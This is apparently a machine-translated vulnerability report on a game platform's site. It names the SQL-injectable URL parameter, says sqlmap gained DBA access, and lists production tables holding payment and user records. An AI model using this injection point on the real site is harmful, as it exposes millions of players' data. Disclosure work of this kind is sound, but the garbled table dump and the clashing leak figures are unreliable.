SQL Injection for DBA permissions on the WAF web game main site (only two databases of the current database are viewed, with more than 2 million user information)
Web game master site DBA permission SQL injection (tens of millions of user information, recharge records, novice card leakage) (involving well-known games such as the wild, storm, and Master)
Web Game Web site: http://www.wa3.com/
It says:
Wow web games, the most distinctive web game platform! There are already 11303320 players in the world
This results in leakage of millions of game player user information, recharge records, and novice cards.
Injection point: http://www.wa3.com/NewsCard? Gname =
Sqlmap:
Database list, because it is the main site, so almost all the sites across the database can be
DBA permission:
Current Database Information, found recharge records and user information
Current Database Information:
Database: wa3_web_db [48 tables] + tables + | PayOrder_AccountMoney | Pay_error | Sheet1 $ | items | details of all recharge records $ | charge_detail $ | wa3 | web_GameSendPay | web_ad_class | | items | web_article | web_article_class | web_code | web_games | items | web_games_server | items | web_manage_administrative ments | items | web_manage_remark | items | website | web_manage_users | web_page_seo | web_pay_method | web_platform_access | web_points_product | website | web_site | website | web_system_menu | website | | metrics | web_users | web_users_credit | web_users_detail | metrics | web_users_level | metrics | web_users_pay_order | web_users_return | metrics | + metrics +
There are many databases, and only two databases of the current database are viewed, with more than 2 million user information